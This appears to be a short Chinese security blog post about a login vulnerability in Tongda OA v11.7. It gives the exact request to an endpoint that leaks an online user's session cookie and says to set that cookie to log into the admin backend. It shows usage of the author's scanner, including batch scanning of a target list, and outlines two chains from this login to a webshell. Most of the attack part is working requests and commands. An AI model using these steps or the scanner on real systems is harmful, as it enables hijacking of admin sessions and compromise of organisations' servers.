S1xHcL's Blog.

通达OA v11.7 在线用户登录漏洞

Word count: 316Reading time: 1 min
2021/03/13 Share

漏洞简述

通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统

影响版本

通达OA < v11.7

漏洞利用

检测当前用户是否存在线

1
http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

不在线

不在线显示 RELOGIN

在线

在线页面空白,但已拿到SESSION

设置Cookie可直接登录后台

1
http://127.0.0.1/general/index.php

工具利用

https://github.com/S1xHcL/TongDa_Scan

1
2
3
4
5
6
7
8
# 指定 URL
python3 .\TongDa_Scan.py -u 127.0.0.1

# 指定 uid 进行扫描
python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1

# 批量扫描,默认扫描UID为1
python3 .\TongDa_Scan.py -f ./list.txt

待更新

  1. 多线程,加快扫描速度
  2. 自动getshell

方法一

任意用户登录 -> 低权限文件上传 -> 目录穿越 -> 任意文件包含 -> getshell

通达OA代码审计篇 - 11.7 有条件的任意命令执行

方法二

任意用户登录 -> 获取安装目录 -> 任意文件读取(redis账号密码) -> ssrf写文件 -> getshell

通达OA11.7 利用新思路(附EXP)

引用

通达OA v11.7 在线用户登录漏洞 · PeiQi WiKi文库

CATALOG
  1. 1. 漏洞简述
  2. 2. 影响版本
  3. 3. 漏洞利用
  4. 4. 工具利用
  5. 5. 待更新
    1. 5.1. 方法一
    2. 5.2. 方法二
  6. 6. 引用